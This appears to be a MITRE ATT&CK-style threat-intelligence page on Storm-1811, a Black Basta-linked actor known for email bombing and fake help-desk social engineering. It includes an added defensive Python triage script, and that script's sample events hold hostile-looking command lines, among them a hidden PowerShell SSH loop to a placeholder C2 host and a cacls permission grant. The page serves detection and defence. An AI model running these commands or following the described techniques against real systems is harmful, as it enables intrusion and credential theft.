
Storm-1811

Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)(Citation: RedCanary June Insights 2024)
ID: G1046
Associated Groups: 
Created: 14 Mar 2025
Last Modified: 14 Mar 2025

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use
Enterprise T1087 .002 Account Discovery: Domain Account

Storm-1811 has performed domain account enumeration during intrusions.(Citation: Microsoft Storm-1811 2024)

Enterprise T1583 .001 Acquire Infrastructure: Domains

Storm-1811 has created domains for use with RMM tools.(Citation: rapid7-email-bombing)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices.(Citation: rapid7-email-bombing)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Storm-1811 has used PowerShell for multiple purposes, such as using PowerShell scripts executing in an infinite loop to create an SSH connection to a command and control server.(Citation: rapid7-email-bombing)

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1074 .001 Data Staged: Local Data Staging

Storm-1811 has locally staged captured credentials for subsequent manual exfiltration.(Citation: rapid7-email-bombing)

Enterprise T1585 .003 Establish Accounts: Cloud Accounts

Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes.(Citation: Microsoft Storm-1811 2024)

Enterprise T1048 .002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP).(Citation: rapid7-email-bombing)

Enterprise T1222 .001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Storm-1811 has used `cacls.exe` via batch script to modify file and directory permissions in victim environments.(Citation: rapid7-email-bombing)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate installer (7zG.exe) when that installer is executed with an additional command line parameter of `b` at runtime to load a Cobalt Strike beacon payload.(Citation: rapid7-email-bombing)
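The technique entries for Registry Run keys (T1547.001), PowerShell-driven SSH (T1059.001), `cacls.exe` permission changes (T1222.001) and the `7zG.exe b` DLL sideload (T1574.001) above each describe an observable host behaviour. The script below is an added example, not part of the ATT&CK entry or the cited reports, showing how a defender could turn those descriptions into simple triage rules over endpoint telemetry. The event field names (image, command line, parent, registry key and data), the sample events, and the heuristic that a batch script runs `cacls.exe` under a `cmd.exe` parent are all assumptions made for the example.

```python
"""
Constructed triage example for Storm-1811 behaviours described in the ATT&CK
entry. Added here as illustration; the field layout, sample events and rule
thresholds are assumptions, loosely modelled on Sysmon process-create and
registry-set events.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Run / RunOnce autostart keys, optionally followed by a value name.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$)", re.IGNORECASE)
# Value data that launches a batch script (.bat or .cmd).
BATCH_RE = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
# A PowerShell command line that invokes the ssh client.
SSH_RE = re.compile(r"\bssh(\.exe)?\b", re.IGNORECASE)


@dataclass
class Event:
    kind: str            # "process" or "registry"
    image: str = ""      # image path of the created process
    cmdline: str = ""    # full command line of the process
    parent: str = ""     # parent process image path
    key: str = ""        # registry key written (registry events only)
    data: str = ""       # registry value data (registry events only)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def run_key_batch(ev: Event) -> bool:
    """T1547.001: Run/RunOnce value whose data launches a batch script."""
    return (ev.kind == "registry"
            and RUN_KEY_RE.search(ev.key) is not None
            and BATCH_RE.search(ev.data) is not None)


def sevenzip_sideload(ev: Event) -> bool:
    """T1574.001: 7zG.exe started with a bare 'b' argument, the trigger the
    page describes for loading the planted 7z.DLL."""
    if ev.kind != "process" or basename(ev.image) != "7zg.exe":
        return False
    args = ev.cmdline.split()[1:]  # assumes the first token is the image
    return any(a.lower() == "b" for a in args)


def powershell_ssh(ev: Event) -> bool:
    """T1059.001: PowerShell command line that invokes ssh."""
    return (ev.kind == "process"
            and basename(ev.image) in ("powershell.exe", "pwsh.exe")
            and SSH_RE.search(ev.cmdline) is not None)


def cacls_from_batch(ev: Event) -> bool:
    """T1222.001: cacls.exe spawned by cmd.exe (assumption: that is how a
    batch script would run it)."""
    return (ev.kind == "process"
            and basename(ev.image) == "cacls.exe"
            and basename(ev.parent) == "cmd.exe")


RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("T1547.001", "Registry Run key launching a batch script", run_key_batch),
    ("T1574.001", "7zG.exe sideload trigger argument", sevenzip_sideload),
    ("T1059.001", "PowerShell invoking ssh", powershell_ssh),
    ("T1222.001", "cacls.exe run from a batch script", cacls_from_batch),
]


def triage(events: List[Event]) -> List[Dict[str, str]]:
    """Apply every rule to every event; return one finding per rule hit."""
    findings = []
    for ev in events:
        for tid, name, rule in RULES:
            if rule(ev):
                findings.append({"technique": tid, "name": name,
                                 "event": ev.cmdline or f"{ev.key} = {ev.data}"})
    return findings


# Constructed sample telemetry: four events that should match, four that
# should not. Paths and hosts are placeholders, not indicators from the page.
SAMPLE_EVENTS = [
    Event("registry", key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
          data="C:\\Users\\Public\\update.bat"),
    Event("registry", key="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
          data="C:\\Program Files\\Vendor\\agent.exe"),
    Event("process", image="C:\\Users\\Public\\7zG.exe",
          cmdline='"C:\\Users\\Public\\7zG.exe" b', parent="C:\\Windows\\explorer.exe"),
    Event("process", image="C:\\Program Files\\7-Zip\\7zG.exe",
          cmdline='"C:\\Program Files\\7-Zip\\7zG.exe" x archive.7z', parent="C:\\Windows\\explorer.exe"),
    Event("process", image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          cmdline='powershell.exe -w hidden -c "while($true){ ssh.exe user@c2-host.example; Start-Sleep 5 }"',
          parent="C:\\Windows\\System32\\cmd.exe"),
    Event("process", image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          cmdline="powershell.exe -c Get-Date", parent="C:\\Windows\\explorer.exe"),
    Event("process", image="C:\\Windows\\System32\\cacls.exe",
          cmdline="cacls.exe C:\\staging /E /G Users:F", parent="C:\\Windows\\System32\\cmd.exe"),
    Event("process", image="C:\\Windows\\System32\\cmd.exe",
          cmdline="cmd.exe /c dir", parent="C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['technique']:10} {f['name']}: {f['event']}")
```

Running the block prints one finding per matching sample event, in input order. The rules are deliberately narrow (a bare `b` argument, a `cmd.exe` parent) to keep false positives low on real telemetry; loosening them, for instance flagging any `7zG.exe` outside its install directory, trades precision for coverage.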

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

Storm-1811 has disguised a Cobalt Strike installer as a malicious DLL masquerading as part of a legitimate 7zip installation package.(Citation: rapid7-email-bombing)

Enterprise T1036 .010 Masquerading: Masquerade Account Name

Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing.(Citation: Microsoft Storm-1811 2024)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Storm-1811 has XOR-encoded a Cobalt Strike installation payload in a DLL file that is decoded with a hardcoded key when loaded by a legitimate 7zip installation process.(Citation: rapid7-email-bombing)

Enterprise T1588 .002 Obtain Capabilities: Tool

Storm-1811 acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1566 .002 Phishing: Spearphishing Link

Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials.(Citation: Microsoft Storm-1811 2024)

Enterprise T1566 .003 Phishing: Spearphishing via Service

Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims posing as IT support personnel.(Citation: Microsoft Storm-1811 2024)

Enterprise T1566 .004 Phishing: Spearphishing Voice

Storm-1811 has initiated voice calls with victims posing as IT support to prompt users to download and execute scripts and other tools for initial access.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)

Enterprise T1219 .002 Remote Access Tools: Remote Desktop Software

Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket.(Citation: rapid7-email-bombing)

Enterprise T1021 .004 Remote Services: SSH

Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.(Citation: Microsoft Storm-1811 2024)

Enterprise T1204 .002 User Execution: Malicious File

Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)

Software

ID Name References Techniques
S0357 Impacket (Citation: Impacket Tools) (Citation: rapid7-email-bombing) LLMNR/NBT-NS Poisoning and SMB Relay, Network Sniffing, Kerberoasting, Ccache Files, NTDS, Service Execution, LSASS Memory, Windows Management Instrumentation, Security Account Manager, Lateral Tool Transfer, LSA Secrets
S0190 BITSAdmin (Citation: Microsoft BITSAdmin) (Citation: Microsoft Storm-1811 2024) (Citation: RedCanary June Insights 2024) Lateral Tool Transfer, Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, BITS Jobs
S1070 Black Basta (Citation: Avertium Black Basta June 2022) (Citation: Cyble Black Basta May 2022) (Citation: Deep Instinct Black Basta August 2022) (Citation: Microsoft Storm-1811 2024) (Citation: Minerva Labs Black Basta May 2022) (Citation: NCC Group Black Basta June 2022) (Citation: Palo Alto Networks Black Basta August 2022) (Citation: rapid7-email-bombing) Inhibit System Recovery, System Information Discovery, Safe Mode Boot, Code Signing, Virtualization/Sandbox Evasion, Internal Defacement, Remote System Discovery, Modify Registry, File and Directory Discovery, Data Encrypted for Impact, Debugger Evasion, Malicious File, Linux and Mac File and Directory Permissions Modification, Windows Command Shell, System Service Discovery, System Checks, PowerShell, Windows Service, Windows Management Instrumentation, Binary Padding, Native API, System Shutdown/Reboot, Match Legitimate Resource Name or Location, Mutual Exclusion, Masquerade Task or Service
S0154 Cobalt Strike (Citation: cobaltstrike manual) (Citation: Microsoft Storm-1811 2024) (Citation: rapid7-email-bombing) Domain Fronting, Sudo and Sudo Caching, Code Signing, Scheduled Transfer, JavaScript, Remote Desktop Protocol, Native API, Pass the Hash, Domain Accounts, Indicator Removal from Tools, Bypass User Account Control, System Network Configuration Discovery, Service Execution, PowerShell, Web Protocols, Application Layer Protocol, Data from Local System, Disable or Modify Tools, Dynamic-link Library Injection, Local Accounts, Multiband Communication, Keylogging, Distributed Component Object Model, Process Discovery, BITS Jobs, Process Hollowing, Software Discovery, Local Accounts, BITS Jobs, Remote Desktop Protocol, Internal Proxy, Exploitation for Privilege Escalation, Screen Capture, Process Argument Spoofing, Modify Registry, Domain Groups, System Network Connections Discovery, Protocol or Service Impersonation, Parent PID Spoofing, Token Impersonation/Theft, Protocol Tunneling, Windows Service, Visual Basic, Native API, Parent PID Spoofing, Process Injection, System Service Discovery, Timestomp, System Network Configuration Discovery, SSH, File and Directory Discovery, DNS, Token Impersonation/Theft, DNS, Bypass User Account Control, Process Hollowing, Scheduled Transfer, Security Account Manager, Local Groups, PowerShell, SSH, Python, Reflective Code Loading, Remote System Discovery, LSASS Memory, Screen Capture, Commonly Used Port, Query Registry, Domain Account, Data Transfer Size Limits, Network Service Discovery, Pass the Hash, Domain Accounts, Network Share Discovery, Web Protocols, Asymmetric Cryptography, Windows Command Shell, Process Injection, Browser Session Hijacking, Deobfuscate/Decode Files or Information, Remote System Discovery, Visual Basic, Protocol Tunneling, Exploitation for Privilege Escalation, Windows Management Instrumentation, Keylogging, Browser Session Hijacking, Windows Remote Management, Symmetric Cryptography, Non-Application Layer Protocol, Standard Encoding, Ingress Tool Transfer, Indicator Removal from Tools, Domain Account, Internal Proxy, Service Execution, Windows Remote Management, SMB/Windows Admin Shares, Rundll32, Windows Service, File Transfer Protocols, Python, SMB/Windows Admin Shares, Windows Management Instrumentation, Security Account Manager, Make and Impersonate Token, Exploitation for Client Execution, Network Service Discovery, Timestomp, Distributed Component Object Model, Multiband Communication, Commonly Used Port, Network Share Discovery, Custom Command and Control Protocol, Process Discovery, Make and Impersonate Token, Data from Local System, Office Template Macros, Windows Command Shell, Obfuscated Files or Information
S0650 QakBot (Citation: ATT QakBot April 2021) (Citation: Kaspersky QakBot September 2021) (Citation: Microsoft Storm-1811 2024) (Citation: Pinkslipbot) (Citation: QBot) (Citation: QuackBot) (Citation: Red Canary Qbot) (Citation: Trend Micro Qakbot December 2020) Regsvr32, Hidden Files and Directories, System Checks, Remote System Discovery, Data from Local System, External Proxy, PowerShell, Windows Command Shell, Security Software Discovery, Native API, Binary Padding, Windows Service, Domain Generation Algorithms, File and Directory Discovery, Registry Run Keys / Startup Folder, Fileless Storage, Masquerade File Type, Network Share Discovery, Process Hollowing, JavaScript, Msiexec, Deobfuscate/Decode Files or Information, Local Email Collection, Malicious Link, System Time Discovery, Malicious File, Exfiltration Over C2 Channel, System Owner/User Discovery, HTML Smuggling, Internet Connection Discovery, Symmetric Cryptography, Command Obfuscation, Web Protocols, Code Signing, Obfuscated Files or Information, Exploitation of Remote Services, Process Discovery, Local Groups, DLL, System Network Configuration Discovery, Steal Web Session Cookie, Process Injection, Domain Trust Discovery, Local Data Staging, Brute Force, Mark-of-the-Web Bypass, Browser Session Hijacking, Time Based Evasion, Ingress Tool Transfer, Peripheral Device Discovery, Non-Application Layer Protocol, Spearphishing Link, Indicator Removal from Tools, Modify Registry, Spearphishing Attachment, Keylogging, Replication Through Removable Media, Standard Encoding, Visual Basic, System Information Discovery, Windows Management Instrumentation, Application Window Discovery, Software Discovery, System Network Connections Discovery, Scheduled Task, Rundll32, Protocol Tunneling, Credentials from Web Browsers, Software Packing, Disable or Modify Tools, File Deletion
S1209 Quick Assist (Citation: Microsoft Quick Assist 2024) (Citation: Microsoft Storm-1811 2024) Web Protocols, Screen Capture, Video Capture
S0029 PsExec (Citation: Microsoft Storm-1811 2024) (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) SMB/Windows Admin Shares, Windows Service, Lateral Tool Transfer, Service Execution, Domain Account
